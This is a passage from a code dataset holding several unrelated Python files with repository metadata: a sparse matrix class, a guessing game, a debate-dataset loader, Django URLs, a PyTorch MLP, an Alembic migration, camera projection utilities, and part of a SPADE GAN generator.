_MatrixElement:\n def __init__(self, row, col, value):\n self.row = row\n self.col = col\n self.value = value\n","repo_name":"storypku/tlpi","sub_path":"Data.Structures.and.Algorithms.Using.Python/sparse_matrix.py","file_name":"sparse_matrix.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"9557713389","text":"import random\n\n\nrandom_answer= random.randint(1,9)\n\n\nfor x in range(1,6):\n guessedAnswer= int(input(\"Guess The Number-\"))\n \n if random_answer==guessedAnswer: \n print(\"your guess is absolutely correct\")\n break\n\n elif guessedAnswer>random_answer :\n print(\"Your number is too high\")\n\n else : \n print(\"Your number is too 
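One bug worth flagging in SparseMatrix.__mul__ above: the product of an m x n and an n x p matrix is m x p, but the method sizes the result with self's own column count, so it is only correct when the right-hand matrix happens to be square. A corrected sketch that reuses the class's own accessors:

def __mul__(self, rhsMatrix):
    assert rhsMatrix.numRows() == self.numCols(), \
        "Matrix sizes not compatible for the multiply operation!"
    # (m x n) * (n x p) is (m x p): take the column count from the
    # right-hand operand, not from self.
    newMatrix = SparseMatrix(self.numRows(), rhsMatrix.numCols())
    for elem in self._elemList:
        for relem in rhsMatrix._elemList:
            if elem.col == relem.row:
                newMatrix[elem.row, relem.col] += elem.value * relem.value
    return newMatrix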
low\")\n\n\n\n","repo_name":"Energizerk-47/Project96","sub_path":"guessingGame.py","file_name":"guessingGame.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75043425066","text":"from data.dataset import DataRow, DatasetType, RawDataLoader, RawDataset, SpeakerType, SpeechData, SplitType\nfrom data.quality_loader import QualityLoader, QualityDataset\nfrom data.scratchpad_quality_debates_loader import ScratchpadQualityDebatesLoader, ScratchpadQualityDebatesDataset\nimport utils.constants as constants\n\nfrom typing import Any, Optional\n\nfrom pydantic import BaseModel\nimport json\nimport os\nimport pickle\n\n\nclass QuoteRelevanceTopicInfo(BaseModel):\n question: str\n a_position: str\n b_position: str\n\n\nclass QuoteRelevanceProcessedBatchItem(BaseModel):\n a_quote_map: dict[str, int]\n b_quote_map: dict[str, int]\n question_info: QuoteRelevanceTopicInfo\n\n\nclass QuoteRelevanceDataset(QualityDataset):\n FILTER_THRESHOLD = 5\n\n def __init__(\n self,\n train_data: list[dict[str, Any]],\n val_data: list[dict[str, Any]],\n test_data: list[dict[str, Any]],\n quote_label_file_path: str,\n scratchpad_dataset: ScratchpadQualityDebatesDataset,\n ):\n \"\"\"Dataset that builds on top of the quality dataset but there are scratchpads added that contain\n the most relevant quotes from the passage\"\"\"\n super().__init__(\n train_data=train_data,\n val_data=val_data,\n test_data=test_data,\n override_type=DatasetType.QUOTE_RELEVANCE,\n allow_multiple_positions_per_question=True,\n )\n self.__match_processed_quotes_to_stories(\n quote_label_file_path=quote_label_file_path, scratchpad_dataset=scratchpad_dataset\n )\n\n def __match_processed_quotes_to_stories(\n self, quote_label_file_path: str, scratchpad_dataset: ScratchpadQualityDebatesDataset\n ):\n def standardize_string(input_string: str):\n return input_string.strip().lower()\n\n with open(quote_label_file_path, \"rb\") as f:\n quote_labels = pickle.load(f)\n\n pairs = []\n for i, item in enumerate(quote_labels):\n question_info = item.question_info\n for j, row in enumerate(self.data[SplitType.TRAIN]):\n positions = [standardize_string(position) for position in row.positions]\n if (\n standardize_string(row.question) == standardize_string(question_info.question)\n and standardize_string(question_info.a_position) in positions\n and standardize_string(question_info.b_position) in positions\n ):\n pairs.append((item, row))\n break\n\n rows_to_use = []\n for item, row in pairs:\n row.speeches = []\n\n filtered_a_quote_map = {\n quote: score\n for quote, score in filter(lambda x: x[1] > QuoteRelevanceDataset.FILTER_THRESHOLD, item.a_quote_map.items())\n }\n a_scratchpad = \"\\n\\n\".join(\n [\n f\"{(i + 1)}. {constants.QUOTE_TAG}{quote}{constants.UNQUOTE_TAG}\"\n for i, quote in enumerate(filter(lambda x: x, filtered_a_quote_map))\n ]\n ).strip()\n row.speeches.append(SpeechData(text=\"\", position=0, speaker_type=SpeakerType.DEBATER, scratchpad=a_scratchpad))\n\n filtered_b_quote_map = {\n quote: score\n for quote, score in filter(lambda x: x[1] > QuoteRelevanceDataset.FILTER_THRESHOLD, item.b_quote_map.items())\n }\n\n b_scratchpad = \"\\n\\n\".join(\n [\n f\"{(i + 1)}. 
{constants.QUOTE_TAG}{quote}{constants.UNQUOTE_TAG}\"\n                for i, quote in enumerate(filter(lambda x: x, filtered_b_quote_map))\n            ]\n        ).strip()\n        row.speeches.append(SpeechData(text=\"\", position=1, speaker_type=SpeakerType.DEBATER, scratchpad=b_scratchpad))\n\n        if a_scratchpad or b_scratchpad:\n            rows_to_use.append(row)\n\n        rows_to_use.extend(scratchpad_dataset.get_data(split=SplitType.TRAIN))\n\n        self.data[SplitType.TRAIN] = rows_to_use\n        self.data[SplitType.VAL] = []\n        self.data[SplitType.TEST] = []\n\n\nclass QuoteRelevanceLoader(RawDataLoader):\n    DEFAULT_QUOTE_LABEL_FILE_PATH = os.environ[\"SRC_ROOT\"] + \"data/datasets/quote-relevance/quote-relevance.p\"\n\n    @classmethod\n    def load(\n        cls,\n        train_filepath: Optional[str] = None,\n        val_filepath: Optional[str] = None,\n        test_filepath: Optional[str] = None,\n        supplemental_file_paths: Optional[dict[str, str]] = None,\n        **kwargs,\n    ) -> QuoteRelevanceDataset:\n        \"\"\"Constructs a QuoteRelevanceDataset\"\"\"\n        quote_label_file_path = (\n            supplemental_file_paths.get(\"quote_label_file_path\", QuoteRelevanceLoader.DEFAULT_QUOTE_LABEL_FILE_PATH)\n            if supplemental_file_paths\n            else QuoteRelevanceLoader.DEFAULT_QUOTE_LABEL_FILE_PATH\n        )\n\n        debate_file_path = supplemental_file_paths.get(\"debate_file_path\", None) if supplemental_file_paths else None\n        scratchpad_dataset = ScratchpadQualityDebatesLoader.load(full_dataset_filepath=debate_file_path, deduplicate=False)\n\n        train, val, test = QualityLoader.get_splits(\n            train_filepath=train_filepath, val_filepath=val_filepath, test_filepath=test_filepath\n        )\n\n        return QuoteRelevanceDataset(\n            train_data=train,\n            val_data=val,\n            test_data=val,\n            quote_label_file_path=quote_label_file_path,\n            scratchpad_dataset=scratchpad_dataset,\n        )\n","repo_name":"samuelarnesen/nyu-debate-modeling","sub_path":"data/quote_relevance_loader.py","file_name":"quote_relevance_loader.py","file_ext":"py","file_size_in_byte":5568,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"36296421147","text":"\"\"\"\nDocstring pending for this module\n\"\"\"\n\n\nfrom django.conf.urls import patterns, url\nfrom vehiculo.views import VehiculoListView, VehiculoView, \\\n    VehiculoUpdate, VehiculoDelete, DetalleDeVehiculoListView, \\\n    DetalleDeVehiculoView, DetalleDeVehiculoUpdate, \\\n    DetalleDeVehiculoDelete, ChoferAsignadoListView, \\\n    ChoferAsignadoView, ChoferAsignadoUpdate, \\\n    ChoferAsignadoDelete\n\n\nurlpatterns = patterns('',\n                       url(r'^$',\n                           VehiculoListView.as_view(),\n                           name='list_vehiculo'),\n                       url(r'^nuevo/',\n                           VehiculoView.as_view(),\n                           name='add_vehiculo'),\n                       url(r'^editar/(?P<pk>\\d+)/$',\n                           VehiculoUpdate.as_view(),\n                           name='edit_vehiculo'),\n                       url(r'^eliminar/(?P<pk>\\d+)/$',\n                           VehiculoDelete.as_view(),\n                           name='eliminar_vehiculo'),\n                       url(r'^detalle_de_vehiculo/$',\n                           DetalleDeVehiculoListView.as_view(),\n                           name='list_detalledevehiculo'),\n                       url(r'^detalle_de_vehiculo/nuevo/',\n                           DetalleDeVehiculoView.as_view(),\n                           name='add_detalledevehiculo'),\n                       url(r'^detalle_de_vehiculo/editar/(?P<pk>\\d+)/$',\n                           DetalleDeVehiculoUpdate.as_view(),\n                           name='edit_detalledevehiculo'),\n                       url(r'^detalle_de_vehiculo/eliminar/(?P<pk>\\d+)/$',\n                           DetalleDeVehiculoDelete.as_view(),\n                           name='eliminar_detalledevehiculo'),\n                       url(r'^chofer_asignado/$',\n                           ChoferAsignadoListView.as_view(),\n                           name='list_choferasignado'),\n                       url(r'^chofer_asignado/nuevo/',\n                           ChoferAsignadoView.as_view(),\n                           name='add_choferasignado'),\n                       url(r'^chofer_asignado/editar/(?P<pk>\\d+)/$',\n                           ChoferAsignadoUpdate.as_view(),\n                           
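The filtered_a_quote_map / filtered_b_quote_map construction above wraps filter(lambda ...) inside a dict literal; a plain dict comprehension expresses the same threshold cut more directly (an equivalent sketch, using the class's own constant):

def filter_quote_map(quote_map: dict, threshold: int) -> dict:
    # Keep only quotes scored strictly above the threshold.
    return {quote: score for quote, score in quote_map.items() if score > threshold}

# e.g. filter_quote_map(item.b_quote_map, QuoteRelevanceDataset.FILTER_THRESHOLD)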
name='edit_choferasignado'),\n                       url(r'^chofer_asignado/eliminar/(?P<pk>\\d+)/$',\n                           ChoferAsignadoDelete.as_view(),\n                           name='eliminar_choferasignado'),\n                       )\n","repo_name":"yusnelvy/mtvmcotizacionv02","sub_path":"vehiculo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73408798826","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport pdb\n\nclass ptomlp(nn.Module):\n\n    def __init__(self):\n        '''\n        A small fully connected head: 18 inputs -> 128 -> 256 -> 3 outputs.\n        '''\n        super(ptomlp, self).__init__()\n        self.l1 = nn.Linear(18, 128)\n        torch.nn.init.xavier_uniform_(self.l1.weight)\n        self.l1.bias.data.fill_(0.01)\n        self.l2 = nn.Linear(128, 256)\n        torch.nn.init.xavier_uniform_(self.l2.weight)\n        self.l2.bias.data.fill_(0.01)\n        self.l3 = nn.Linear(256,3)\n        torch.nn.init.xavier_uniform_(self.l3.weight)\n        self.l3.bias.data.fill_(0.01)\n        #self.BN_a2 = nn.BatchNorm2d(num_features)\n\n    def forward(self, x):\n        out = self.l1(x)\n        out = F.relu(out)\n        out = self.l2(out)\n        out = F.relu(out)\n        out = self.l3(out)\n\n        return out\n\n\n\n\n\n    ","repo_name":"Gyiming/Adaptive-Adversarial-Network","sub_path":"models/cifar10/ptolemymlp.py","file_name":"ptolemymlp.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19748100670","text":"\"\"\"empty message\n\nRevision ID: 450600fd7864\nRevises: fcc3038adf2b\nCreate Date: 2019-06-28 20:31:04.485654\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '450600fd7864'\ndown_revision = 'fcc3038adf2b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_index('username', table_name='admin')\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! 
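ptolemymlp.py above repeats the same initialization lines per layer; a common PyTorch idiom (not from the original repo) centralizes it with Module.apply, using the in-place xavier_uniform_ that replaced the deprecated spelling:

import torch.nn as nn

def init_weights(module: nn.Module) -> None:
    # Xavier-init every Linear layer in one place.
    if isinstance(module, nn.Linear):
        nn.init.xavier_uniform_(module.weight)
        nn.init.constant_(module.bias, 0.01)

model = ptomlp()
model.apply(init_weights)  # recurses over all submodules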
###\n op.create_index('username', 'admin', ['username'], unique=True)\n # ### end Alembic commands ###\n","repo_name":"baixiaosheng-no1/HelloBlog","sub_path":"eBlog/migrations/versions/450600fd7864_.py","file_name":"450600fd7864_.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23644444462","text":"import json\nimport cv2\nimport numpy as np\nfrom numpy.linalg import inv\n\n\ndef distortion_coeffs(k1=0.0, k2=0.0, p1=0.0, p2=0.0, k3=0.0):\n \"\"\"Composes a 5x1 cv2 compatible matrix of distortion coefficients\n\n Args:\n k1 (float): First radial distortion coefficient.\n k2 (float): Second radial distortion coefficient.\n p1 (float): First tangential distortion coefficient.\n p2 (float): Second tangential distortion coefficient.\n k3 (float): Third radial distortion coefficient.\n \"\"\"\n return np.array([k1, k2, p1, p2, k3])\n\n\ndef intrinsic_matrix(fx=1.0, fy=1.0, cx=0.5, cy=0.5):\n \"\"\"Composes a 3x3 intrinsic matrix from the provided information\n\n Args:\n fx (float): Focal length of the camera in x.\n fy (float): Focal length of the camera in y.\n cx (float): X-coordinate of the principal point.\n cy (float): Y-coordinate of the principal point.\n \"\"\"\n return np.array([[fx, 0.0, cx], [0.0, fy, cy], [0.0, 0.0, 1.0]])\n\n\ndef pose_matrix(R=None, t=None):\n \"\"\"Composes the 4x4 pose matrix from R and t\n\n Args:\n R (ndarray): Either a 3x3 rotation matrix or a Rodrigues rotation\n vector. Defaults to no rotation.\n t (ndarray): A 3 element vector denoting the translation. Defaults to\n [0, 0, 0].\n \"\"\"\n # Default to no rotation\n if R is None:\n R = np.eye(3)\n # Default to origin\n if t is None:\n t = [0, 0, 0]\n # Convert lists to ndarrays\n R = Marshal.ndarrayify(R)\n t = Marshal.ndarrayify(t)\n # Convert from Rodrigues notation if necessary\n if R.shape == (3,):\n R, _ = cv2.Rodrigues(R)\n # Construct the matrix\n H = np.eye(4)\n H[:3, :3] = R\n H[:3, 3] = t\n return H\n\n\ndef pose_to_vectors(Tw):\n \"\"\"Extracts the rotation and translation vector from a pose matrix\n\n Args:\n Tw (ndarray): A 4x4 pose matrix.\n\n Returns: A tuple (r, t)\n r (ndarray): Rodrigues rotation vector.\n t (ndarray): Translation vector.\n \"\"\"\n r, _ = cv2.Rodrigues(Tw[:3, :3])\n r = np.squeeze(r)\n t = Tw[:3, 3]\n return r, t\n\n\nclass Marshal(object):\n \"\"\"A collection of useful marshalling and demarshalling functions\"\"\"\n\n @staticmethod\n def listify(d):\n \"\"\"Converts all ndarrays in dict d to lists\"\"\"\n if isinstance(d, np.ndarray):\n return d.tolist()\n if not isinstance(d, dict):\n return d\n return {k: Marshal.listify(v) for k, v in d.items()}\n\n @staticmethod\n def ndarrayify(d):\n \"\"\"Converts all lists in d to ndarrays\"\"\"\n if isinstance(d, np.ndarray):\n return d\n if isinstance(d, list):\n return np.array(d)\n if not isinstance(d, dict):\n return d\n return {k: Marshal.ndarrayify(v) for k, v in d.items()}\n\n @staticmethod\n def jsonify(d):\n \"\"\"Converts the data into a json compatible string.\n\n This opperation converts the ids into strings and the ndarrays into\n lists.\n\n Args:\n d (dict): A dictionary to make json compatible.\n \"\"\"\n return json.dumps({str(id_): x for id_, x in Marshal.listify(d).items()})\n\n\ndef back_project(points_2d, z_worlds, K, Tw, dist_coeffs):\n \"\"\"Back project points in the image plane to 3D\n\n A single point in the image plane correspods to a ray in 3D space. 
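pose_matrix and pose_to_vectors in camera.py above are inverses of each other up to the Rodrigues conversion, which makes a cheap self-check possible (assumes the two helpers plus numpy/cv2 from the module; exact recovery holds for rotation angles below pi):

import numpy as np

r = np.array([0.1, -0.2, 0.3])   # Rodrigues rotation vector
t = np.array([1.0, 2.0, 3.0])    # translation

Tw = pose_matrix(R=r, t=t)       # build the 4x4 pose
r2, t2 = pose_to_vectors(Tw)     # recover the vectors

assert np.allclose(r, r2) and np.allclose(t, t2)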
This\n method determines the 3D cooridates of the points where rays cast out\n of the image plane intersect with the provided heights.\n\n Args:\n points_2d (ndarray): An Nx2 array of image coordinates to back\n project.\n z_worlds (ndarray): A list-like object of N heights (assuming z=0\n is the ground plane) to back project to.\n K (ndarray): A 3x3 intrinsic matrix.\n Tw (ndarray): A 4x4 pose matrix.\n dist_coeffs (ndarray): An array of distortion coefficients of the form\n [k1, k2, [p1, p2, [k3]]], where ki is the ith\n radial distortion coefficient and pi is the ith\n tangential distortion coeff.\n \"\"\"\n # Unpack the intrinsics we are going to need for this calculation.\n fx, fy = K[0, 0], K[1, 1]\n ccx, ccy = K[0, 2], K[1, 2]\n points_2d = Marshal.ndarrayify(points_2d)\n points_2d = cv2.undistortPoints(\n points_2d[:, np.newaxis], K, dist_coeffs, P=K\n ).squeeze(axis=1)\n points_3d = []\n # TODO: Vectorize\n for (x_image, y_image), z_world in zip(points_2d, z_worlds):\n kx = (x_image - ccx) / fx\n ky = (y_image - ccy) / fy\n # get point position in camera coordinates\n z3d = (z_world - Tw[2, 3]) / np.dot(Tw[2, :3], [kx, ky, 1])\n x3d = kx * z3d\n y3d = ky * z3d\n # transform the point to world coordinates\n x_world, y_world = (Tw @ [x3d, y3d, z3d, 1])[:2]\n points_3d.append((x_world, y_world, z_world))\n return np.array(points_3d)\n\n\ndef distortion(points_2d, K, dist_coeffs=None):\n if dist_coeffs is None:\n return points_2d\n\n k1, k2, p1, p2, k3 = dist_coeffs\n cx, cy = K[0, 2], K[1, 2]\n fx, fy = K[0, 0], K[1, 1]\n\n # To relative coordinates\n x = (points_2d[:, 0] - cx) / fx\n y = (points_2d[:, 1] - cy) / fy\n r2 = x * x + y * y\n\n # Radial distorsion\n xdistort = x * (1 + k1 * r2 + k2 * r2 * r2 + k3 * r2 * r2 * r2)\n ydistort = y * (1 + k1 * r2 + k2 * r2 * r2 + k3 * r2 * r2 * r2)\n\n # Tangential distorsion\n xdistort += 2 * p1 * x * y + p2 * (r2 + 2 * x * x)\n ydistort += p1 * (r2 + 2 * y * y) + 2 * p2 * x * y\n\n # Back to absolute coordinates.\n xdistort = xdistort * fx + cx\n ydistort = ydistort * fy + cy\n\n return np.stack([xdistort, ydistort]).T\n\n\ndef project(points_3d, K, Tw, dist_coeffs=None):\n def make_3x4(K, Tw):\n tmp = np.append(np.eye(3), np.zeros((3, 1)), axis=1)\n return K @ tmp @ np.linalg.inv(Tw)\n\n P = make_3x4(K, Tw)\n p3d_ = np.hstack((points_3d, np.ones([len(points_3d), 1], dtype=points_3d.dtype)))\n p2d_ = p3d_ @ P.T\n p2d = p2d_[:, 0:2] / p2d_[:, 2:3]\n\n # only valid point needs distortion\n valid = np.all(p2d > 0, axis=1) & np.all(p2d < 1, axis=1)\n valid_p2d = p2d[valid]\n if len(valid_p2d) > 0:\n p2d[valid] = distortion(valid_p2d, K, dist_coeffs)\n\n return np.squeeze(p2d)\n\n\nclass Camera(object):\n \"\"\"Data class that models a single camera's intrinsics and extrinsics\"\"\"\n\n def __init__(self, K=None, Tw=None, dist_coeffs=None):\n \"\"\"Contruct a Camera\n\n Args:\n K (ndarray): A 3x3 intrinsic matrix\n Tw (ndarray): A 4x4 pose matrix\n dist_coeffs (ndarray): An array of distortion coefficients of the\n form [k1, k2, [p1, p2, [k3]]], where k_i is\n the ith radial_distortion coefficient and\n p_i is the ith tangential distortion coeff.\n \"\"\"\n self.K = intrinsic_matrix() if K is None else Marshal.ndarrayify(K)\n if self.K.shape != (3, 3):\n raise ValueError(\"Intrinsic Matrix K should be 3x3.\")\n self.Tw = pose_matrix() if Tw is None else Marshal.ndarrayify(Tw)\n if self.Tw.shape != (4, 4):\n raise ValueError(\"Pose Matrix K should be 4x4.\")\n dist_coeffs = [] if dist_coeffs is None else dist_coeffs\n self.dist_coeffs = 
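A handy sanity check for the module-level project/back_project pair defined above: a pixel back-projected onto a known height and re-projected should land where it started. A sketch with zero distortion and a camera translated off the ground plane (all helper names come from this module):

import numpy as np

K = intrinsic_matrix(fx=1.2, fy=1.2, cx=0.5, cy=0.5)
Tw = pose_matrix(t=[0.0, 0.0, 5.0])   # camera 5 units above z=0
dist = distortion_coeffs()            # all-zero coefficients

pixels = np.array([[0.4, 0.6], [0.55, 0.45]])
points_3d = back_project(pixels, z_worlds=[0.0, 0.0], K=K, Tw=Tw, dist_coeffs=dist)
reprojected = project(points_3d, K=K, Tw=Tw, dist_coeffs=dist)

assert np.allclose(reprojected, pixels, atol=1e-6)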
distortion_coeffs(*dist_coeffs)\n\n    def update_camera_location(self, new_location):\n        self.Tw[:3, -1] = new_location\n\n    def update_euler_angles(self, new_angles):\n        rx, ry, rz = map(lambda r: r * np.pi / 180, new_angles)\n\n        sa = np.sin(rx)\n        ca = np.cos(rx)\n        sb = np.sin(ry)\n        cb = np.cos(ry)\n        sg = np.sin(rz)\n        cg = np.cos(rz)\n\n        r11 = cb * cg\n        r12 = cg * sa * sb - ca * sg\n        r13 = sa * sg + ca * cg * sb\n        r21 = cb * sg\n        r22 = sa * sb * sg + ca * cg\n        r23 = ca * sb * sg - cg * sa\n        r31 = -sb\n        r32 = cb * sa\n        r33 = ca * cb\n\n        R = np.asarray([[r11, r12, r13], [r21, r22, r23], [r31, r32, r33]])\n        self.Tw[0:3, 0:3] = inv(R)\n\n    @property\n    def euler_angles(self):\n        Tw = np.linalg.inv(self.Tw)\n        rx = np.arctan2(Tw[2, 1], Tw[2, 2])\n        ry = np.arctan2(-Tw[2, 0], np.sqrt(Tw[2, 1] ** 2 + Tw[2, 2] ** 2))\n        rz = np.arctan2(Tw[1, 0], Tw[0, 0])\n\n        rx, ry, rz = map(lambda r: r * 180 / np.pi, [rx, ry, rz])\n        return rx, ry, rz\n\n    @property\n    def aspect(self):\n        \"\"\"Returns the aspect ratio of the camera\"\"\"\n        return self.K[1, 1] / self.K[0, 0]\n\n    @property\n    def location(self):\n        \"\"\"Returns the 3D location of the camera\"\"\"\n        return self.Tw[:3, -1]\n\n    @property\n    def look_at(self):\n        \"\"\"Returns the intersection of the optical axis and the floor\"\"\"\n        return self.back_project(points_2d=[[0.5, 0.5]], z_worlds=[0.0])[0]\n\n    def unnormalized(self, h):\n        \"\"\"Returns an unnormalized version of the intrinsic matrix K\"\"\"\n        w = self.aspect * h\n        return np.diag([w, h, 1.0]) @ self.K\n\n    def back_project(self, points_2d, z_worlds):\n        \"\"\"Back project points in the image plane to 3D\n\n        A single point in the image plane corresponds to a ray in 3D space. This\n        method determines the 3D coordinates of the points where rays cast out\n        of the image plane intersect with the provided heights.\n\n        Args:\n            points_2d (ndarray): An Nx2 array of image coordinates to back\n                                 project.\n            z_worlds (ndarray): A list-like object of N heights (assuming z=0\n                                is the ground plane) to back project to.\n        \"\"\"\n        return back_project(\n            points_2d=points_2d,\n            z_worlds=z_worlds,\n            K=self.K,\n            Tw=self.Tw,\n            dist_coeffs=self.dist_coeffs,\n        )\n\n    def get_distance(self, points_3d):\n        \"\"\"Get distance of the 3D points to the camera\n\n        Args:\n            points_3d (ndarray): An Nx3 array of 3D points to calculate\n                                 distance\n        \"\"\"\n        return np.linalg.norm(points_3d - self.location, axis=-1)\n\n    def project(self, points_3d):\n        \"\"\"Project the 3D points into the image plane of this camera\n\n        Args:\n            points_3d (ndarray): An Nx3 array of 3D points to project.\n        \"\"\"\n        return project(\n            points_3d=points_3d, K=self.K, Tw=self.Tw, dist_coeffs=self.dist_coeffs\n        )\n\n    @classmethod\n    def from_dict(cls, d):\n        \"\"\"Construct a camera from a dict\n\n        Args:\n            d (dict): A dictionary containing entries for:\n                - 'K': A 3x3 intrinsic matrix\n                - 'Tw': A 4x4 pose matrix\n                - 'dist_coeffs': A (5,) vector of distortion coefficients\n        \"\"\"\n        w, h = d.get(\"image_wh\", [1.0, 1.0])\n        return Camera(\n            K=cls.normalize(d[\"K\"], w, h) if \"K\" in d else None,\n            Tw=d.get(\"Tw\", d.get(\"pose\")),\n            dist_coeffs=d.get(\"dist_coeffs\"),\n        )\n\n    @staticmethod\n    def normalize(K, w, h):\n        \"\"\"Normalizes the intrinsic matrix K by the given width and height\"\"\"\n        return np.diag([1.0 / w, 1.0 / h, 1.0]) @ K\n\n    def to_dict(self, legacy_format=False):\n        \"\"\"Returns a dict representation of this camera\"\"\"\n        # We include a look_at point to make life easier on the visualization\n        # team. 
They need to know where the optical axis intersects with the\n # groundplane to properly visualize the cameras. If we don't serialize\n # this value, they would need to write a javascript implementation of\n # backprojection. This saves them some trouble.\n d = {\n \"K\": self.K,\n \"Tw\": self.Tw,\n \"dist_coeffs\": self.dist_coeffs,\n \"look_at\": self.look_at,\n }\n if legacy_format:\n # Arbitrarily choose a height to be 1\n h = 1\n w = self.aspect * h\n d[\"K\"] = self.unnormalized(h)\n d[\"image_wh\"] = [w, h]\n return d\n\n def __eq__(self, other):\n \"\"\"Override default __eq__ because ndarrays are not comparable\"\"\"\n if not isinstance(other, Camera):\n return False\n return all(\n [\n np.allclose(self.K, other.K),\n np.allclose(self.Tw, other.Tw),\n np.allclose(self.dist_coeffs, other.dist_coeffs),\n ]\n )\n\n def __repr__(self):\n return \"Camera:\\n\\tK={}\\n\\tTw={}\\n\\tdist_coeffs={}\".format(\n self.K, self.Tw, self.dist_coeffs\n )\n","repo_name":"longcw/crossview_3d_pose_tracking","sub_path":"crossview_dataset/calib/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":12707,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"37"} +{"seq_id":"427595311","text":"from torch import nn\nfrom torch.nn import functional as F\nfrom torch.nn.utils import remove_spectral_norm\n\nfrom models.modules.inception_modules import SPADEInvertedResidualChannels\nfrom models.modules.inception_modules import _get_named_block_list\nfrom models.modules.sync_batchnorm import SynchronizedBatchNorm2d\nfrom models.networks import BaseNetwork\n\n\nclass InceptionSPADEGenerator(BaseNetwork):\n @staticmethod\n def modify_commandline_options(parser, is_train):\n return parser\n\n def __init__(self, opt):\n super(InceptionSPADEGenerator, self).__init__()\n self.opt = opt\n nf = opt.ngf\n\n self.fc_norm = SynchronizedBatchNorm2d(16 * nf, affine=True)\n\n self.sw, self.sh = self.compute_latent_vector_size(opt)\n\n self.fc = nn.Conv2d(self.opt.semantic_nc, 16 * nf, 3, padding=1)\n\n self.head_0 = SPADEInvertedResidualChannels(16 * nf, 16 * nf, opt)\n\n self.G_middle_0 = SPADEInvertedResidualChannels(16 * nf, 16 * nf, opt)\n self.G_middle_1 = SPADEInvertedResidualChannels(16 * nf, 16 * nf, opt)\n\n self.up_0 = SPADEInvertedResidualChannels(16 * nf, 8 * nf, opt)\n self.up_1 = SPADEInvertedResidualChannels(8 * nf, 4 * nf, opt)\n self.up_2 = SPADEInvertedResidualChannels(4 * nf, 2 * nf, opt)\n self.up_3 = SPADEInvertedResidualChannels(2 * nf, 1 * nf, opt)\n\n final_nc = nf\n\n if opt.num_upsampling_layers == 'most':\n self.up_4 = SPADEInvertedResidualChannels(1 * nf, nf // 2, opt)\n final_nc = nf // 2\n\n self.conv_img = nn.Conv2d(final_nc, 3, 3, padding=1)\n\n self.up = nn.Upsample(scale_factor=2)\n\n def compute_latent_vector_size(self, opt):\n if opt.num_upsampling_layers == 'normal':\n num_up_layers = 5\n elif opt.num_upsampling_layers == 'more':\n num_up_layers = 6\n elif opt.num_upsampling_layers == 'most':\n num_up_layers = 7\n else:\n raise ValueError('opt.num_upsampling_layers [%s] not recognized' %\n opt.num_upsampling_layers)\n\n sw = opt.crop_size // (2**num_up_layers)\n sh = round(sw / opt.aspect_ratio)\n\n return sw, sh\n\n def forward(self, input, mapping_layers=[]):\n seg = input\n\n ret_acts = {}\n\n x = F.interpolate(seg, size=(self.sh, self.sw))\n x = self.fc(x)\n x = self.fc_norm(x)\n\n if 'fc' in mapping_layers:\n ret_acts['fc'] = x\n\n x = self.head_0(x, seg)\n if 'head_0' in mapping_layers:\n ret_acts['head_0'] = x\n\n x = 
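Camera.to_dict and Camera.from_dict above round-trip through plain JSON once Marshal.jsonify has converted the ndarrays; from_dict simply ignores the extra look_at entry that to_dict adds for the visualization side. A quick sketch using the module's own classes:

import json

cam = Camera(K=intrinsic_matrix(fx=1.1, fy=1.1), Tw=pose_matrix(t=[0.0, 0.0, 4.0]))

payload = json.loads(Marshal.jsonify(cam.to_dict()))  # ndarrays -> lists -> JSON
restored = Camera.from_dict(payload)

assert cam == restored  # Camera.__eq__ compares with np.allclose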
self.up(x)\n x = self.G_middle_0(x, seg)\n if 'G_middle_0' in mapping_layers:\n ret_acts['G_middle_0'] = x\n\n if self.opt.num_upsampling_layers == 'more' or \\\n self.opt.num_upsampling_layers == 'most':\n x = self.up(x)\n\n x = self.G_middle_1(x, seg)\n if 'G_middle_1' in mapping_layers:\n ret_acts['G_middle_1'] = x\n\n x = self.up(x)\n x = self.up_0(x, seg)\n if 'up_0' in mapping_layers:\n ret_acts['up_0'] = x\n\n x = self.up(x)\n x = self.up_1(x, seg)\n if 'up_1' in mapping_layers:\n ret_acts['up_1'] = x\n\n x = self.up(x)\n x = self.up_2(x, seg)\n if 'up_2' in mapping_layers:\n ret_acts['up_2'] = x\n\n x = self.up(x)\n x = self.up_3(x, seg)\n if 'up_3' in mapping_layers:\n ret_acts['up_3'] = x\n\n if self.opt.num_upsampling_layers == 'most':\n x = self.up(x)\n x = self.up_4(x, seg)\n if 'up_4' in mapping_layers:\n ret_acts['up_4'] = x\n\n x = self.conv_img(F.leaky_relu(x, 2e-1))\n x = F.tanh(x)\n\n if len(mapping_layers) == 0:\n return x\n else:\n return x, ret_acts\n\n def remove_spectral_norm(self):\n x = self.head_0.remove_spectral_norm()\n x = self.G_middle_0.remove_spectral_norm()\n x = self.G_middle_1.remove_spectral_norm()\n\n x = self.up_0.remove_spectral_norm()\n x = self.up_1.remove_spectral_norm()\n x = self.up_2.remove_spectral_norm()\n x = self.up_3.remove_spectral_norm()\n\n if self.opt.num_upsampling_layers == 'most':\n x = self.up_4.remove_spectral_norm()\n\n def get_named_block_list(self):\n return _get_named_block_list(\n self,\n spade=True,\n 